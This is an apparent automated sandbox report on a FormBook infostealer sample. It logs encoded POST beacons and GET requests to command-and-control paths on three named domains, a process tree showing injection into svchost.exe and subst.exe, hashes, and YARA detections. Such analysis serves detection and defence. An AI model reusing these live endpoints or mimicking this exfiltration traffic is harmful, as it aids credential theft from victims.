                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.vendasnaweb1.com
                                                          Origin: http://www.vendasnaweb1.com
                                                          Referer: http://www.vendasnaweb1.com/j5qz/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=9B9BpUrpcoi6nt2d81lT9PRHr4bJOTW3maB9GNrl42PX5b0D1oPkzZCUzDNV2fHqg5s66Rw/UsGb1LeBx3y8DDHj2XlbxowZxcEBr4rvJScx6SFRjmk5p1dPy5tc+JC4tRLIXqW+K/Yc5xy9l9dvN/VCTksOG6J1gXnBFymiEmV5XOjfvHSW2ofIg+CT3ou/UIc5WCT3XMeTAyeas03ehEs=
                                                          Jul 3, 2024 15:59:28.960494041 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:59:28 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          X-Newfold-Cache-Level: 2
                                                          X-Endurance-Cache-Level: 2
                                                          X-nginx-cache: WordPress
                                                          Content-Length: 16449
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session ID: 43 | Source IP: 192.168.2.4 | Source Port: 49780 | Destination IP: 162.241.2.92 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:59:30.591555119 CEST | 10840 | OUT | POST /j5qz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.vendasnaweb1.com
                                                          Origin: http://www.vendasnaweb1.com
                                                          Referer: http://www.vendasnaweb1.com/j5qz/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:59:31.300964117 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:59:31 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          X-Newfold-Cache-Level: 2
                                                          X-Endurance-Cache-Level: 2
                                                          X-nginx-cache: WordPress
                                                          Content-Length: 16449
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session ID: 44 | Source IP: 192.168.2.4 | Source Port: 49781 | Destination IP: 162.241.2.92 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:59:33.129729033 CEST | 465 | OUT | GET /j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI+gpm/LVbhI65FVShh/tgBI/y9RfM7r0s9qzU65mo6yF4gvL+0acj1h9sdpnc2oWt6mPPUzfC6i0Cm604hOcmgozNJQF0xWBsyGELgFo=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.vendasnaweb1.com
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:59:33.824275970 CEST | 581 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Wed, 03 Jul 2024 13:59:33 GMT
                                                          Server: nginx/1.23.4
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 0
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          X-Redirect-By: WordPress
                                                          Location: http://vendasnaweb1.com/j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI+gpm/LVbhI65FVShh/tgBI/y9RfM7r0s9qzU65mo6yF4gvL+0acj1h9sdpnc2oWt6mPPUzfC6i0Cm604hOcmgozNJQF0xWBsyGELgFo=&Y664G=SttDen986
                                                          X-Newfold-Cache-Level: 2
                                                          X-Endurance-Cache-Level: 2
                                                          X-nginx-cache: WordPress
                                                          X-Server-Cache: true
                                                          X-Proxy-Cache: MISS


                                                          Session ID: 45 | Source IP: 192.168.2.4 | Source Port: 49782 | Destination IP: 162.240.81.18 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:59:44.358217001 CEST | 750 | OUT | POST /8pbu/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.dudapolicarpo.online
                                                          Origin: http://www.dudapolicarpo.online
                                                          Referer: http://www.dudapolicarpo.online/8pbu/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=pPlHHh5ku7U5h5VsF0l7taGkrsJg0+BDjT0v7Is4w8GeWaXBffc/d6jtMx8LDOHqnmpQDuNOVfZS6xpG3mHdDcNnXr8g70m2030fLLqSchQmrlKgi9rifAAZ5IH6NrbwqzQ0cDZ3/zbSgY2bSV5BipDyaybmayU0sE7+Y2REzT7QtWmHZNCXKNZDBPRC9bEJZg==
                                                          Jul 3, 2024 15:59:44.940063000 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.20.1
                                                          Date: Wed, 03 Jul 2024 13:59:44 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 3650
                                                          Connection: close
                                                          ETag: "663a05b6-e42"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                          Jul 3, 2024 15:59:44.940102100 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                                          Jul 3, 2024 15:59:44.940118074 CEST | 1236 | IN
                                                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                                          Jul 3, 2024 15:59:44.940138102 CEST | 115 | IN
                                                          Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                                          Session ID: 46 | Source IP: 192.168.2.4 | Source Port: 49783 | Destination IP: 162.240.81.188 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:59:46.894993067 CEST | 770 | OUT | POST /8pbu/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.dudapolicarpo.online
                                                          Origin: http://www.dudapolicarpo.online
                                                          Referer: http://www.dudapolicarpo.online/8pbu/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=pPlHHh5ku7U5zqdsDTR7r6G7kMJg9eBPjT4v7M1jwOieR4fBOuc/c6jtUh8EceH9nmlYDvxOVfNS6zxG3RbeZsNlbL8i0Um2030fLLuschImoU6ghcrlBQAe+IH6Jra5qzRXcH5Z/xTSgYGbSE5CopD0USbxVzFHt2aJGkZfzx3jhw3dI8jAYN9wcIY2wY5ACiexy1emkxwnJV/6SJfbuok=
                                                          Jul 3, 2024 15:59:47.478207111 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.20.1
                                                          Date: Wed, 03 Jul 2024 13:59:47 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 3650
                                                          Connection: close
                                                          ETag: "663a05b6-e42"
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                          Jul 3, 2024 15:59:47.478220940 CEST | 1236 | IN
                                                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                                          Jul 3, 2024 15:59:47.478233099 CEST | 1236 | IN
                                                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                                          Jul 3, 2024 15:59:47.478249073 CEST | 115 | IN
                                                          Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                                          Session ID: 47 | Source IP: 192.168.2.4 | Source Port: 49784 | Destination IP: 162.240.81.188 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:59:49.432513952 CEST | 10852 | OUT | POST /8pbu/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.dudapolicarpo.online
                                                          Origin: http://www.dudapolicarpo.online
                                                          Referer: http://www.dudapolicarpo.online/8pbu/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:59:49.996375084 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.20.1
                                                          Date: Wed, 03 Jul 2024 13:59:49 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 3650
                                                          Connection: close
                                                          ETag: "663a05b6-e42"
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                          Jul 3, 2024 15:59:49.996396065 CEST | 1236 | IN
                                                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                                          Jul 3, 2024 15:59:49.996408939 CEST | 448 | IN
                                                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                                          Jul 3, 2024 15:59:50.002183914 CEST | 903 | IN
                                                          Data Ascii: ibuted with Fedora. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>error_pag


                                                          Session ID: 48 | Source IP: 192.168.2.4 | Source Port: 49785 | Destination IP: 162.240.81.188 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:59:51.980530024 CEST | 469 | OUT | GET /8pbu/?TvpPfhGp=kNNnEV5wtfMTk7EsKDdqofuXk+Rn8vJj2yYB/JV+5cekMazgA8cmAYXSGgFhL+XbvnxEPdo1Vtw1uTcXwhetC6FtU7s9g1m4smEVJIuSZwU+vhX8ycfAGhs=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.dudapolicarpo.online
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:59:52.541429043 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.20.1
                                                          Date: Wed, 03 Jul 2024 13:59:52 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 3650
                                                          Connection: close
                                                          ETag: "663a05b6-e42"
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                          Jul 3, 2024 15:59:52.541451931 CEST | 1236 | IN
                                                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                                          Jul 3, 2024 15:59:52.541465998 CEST | 1236 | IN
                                                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                                          Jul 3, 2024 15:59:52.541476011 CEST | 115 | IN
                                                          Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                                          Session ID: 49 | Source IP: 192.168.2.4 | Source Port: 49786 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:59:57.713947058 CEST | 729 | OUT | POST /50i6/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.rodotest2.pro
                                                          Origin: http://www.rodotest2.pro
                                                          Referer: http://www.rodotest2.pro/50i6/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=ngF0faZjVMWAsNxaYKeSTyM+60k91FaS6wRfdRFdV+zI6wILd84UKIF4ao2/KTYH+Ygcfduwyu/5vuqaMumUk8t0c5QfN9Vx1LProsvJNcfDgzTCBF081Jt1BWCktIZzeaFLzy8ls9O7xWPlGDEKvbbWwVs/zlKZjW6eex/q/l+vTUMhGQcXT+WNvAgxiuwd2g==


                                                          Session ID: 50 | Source IP: 192.168.2.4 | Source Port: 49787 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 16:00:00.244010925 CEST | 749 | OUT | POST /50i6/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.rodotest2.pro
                                                          Origin: http://www.rodotest2.pro
                                                          Referer: http://www.rodotest2.pro/50i6/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Ascii: TvpPfhGp=ngF0faZjVMWAsp1aUJGSECM5wUk97VaW6wtfdV1NVLDI6QYLPt4UJIF4PY2AXjYM+Y9rff6wyur5vvaaMZyTkst2QZRZJ9Vx1LProoGmNd3DhDDCDnc77pt2AWCknoZ3eaFtz2l+s+27xWflBWoL2rbQtFtT70vhsT3qAyuN4xyEbyd7Xh9AB+y+yHpFvtNUtixksDvVwqsquTD5xMKjSeU=


                                                          Session ID: 51 | Source IP: 192.168.2.4 | Source Port: 49788 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 16:00:02.772445917 CEST | 10831 | OUT | POST /50i6/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.rodotest2.pro
                                                          Origin: http://www.rodotest2.pro
                                                          Referer: http://www.rodotest2.pro/50i6/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53


                                                          Session ID: 52 | Source IP: 192.168.2.4 | Source Port: 49789 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 16:00:05.324259043 CEST | 462 | OUT | GET /50i6/?TvpPfhGp=qitUcqUffP2yk+NlTcn0cnkOyWQfzTGozjE+fkR+cpfvqRoRQe0JJpYteZO1ejUj8Zcre8jv6/KV+/CxNuPp0r5bf+UIe/RIppbsiuOOAOzLhzD7OHcJ9fs=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.rodotest2.pro
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 16:00:05.782807112 CEST | 400 | IN | HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Wed, 03 Jul 2024 14:00:05 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 260
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?TvpPfhGp=qitUcqUffP2yk+NlTcn0cnkOyWQfzTGozjE+fkR+cpfvqRoRQe0JJpYteZO1ejUj8Zcre8jv6/KV+/CxNuPp0r5bf+UIe/RIppbsiuOOAOzLhzD7OHcJ9fs=&Y664G=SttDen986"}</script></head></html>

                                                          Target ID:0
                                                          Start time:09:56:02
                                                          Start date:03/07/2024
                                                          Path:C:\Users\user\Desktop\7RsDGpyOQk.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\7RsDGpyOQk.exe"
                                                          Imagebase:0x1a0000
                                                          File size:1'230'848 bytes
                                                          MD5 hash:CF27E45BE1B40DD336D102E1449046D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:09:56:03
                                                          Start date:03/07/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\7RsDGpyOQk.exe"
                                                          Imagebase:0xc70000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:09:56:22
                                                          Start date:03/07/2024
                                                          Path:C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe"
                                                          Imagebase:0xb40000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:4
                                                          Start time:09:56:23
                                                          Start date:03/07/2024
                                                          Path:C:\Windows\SysWOW64\subst.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\subst.exe"
                                                          Imagebase:0xa90000
                                                          File size:14'848 bytes
                                                          MD5 hash:0EAC8241D39176E0FA48B57C76C54742
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
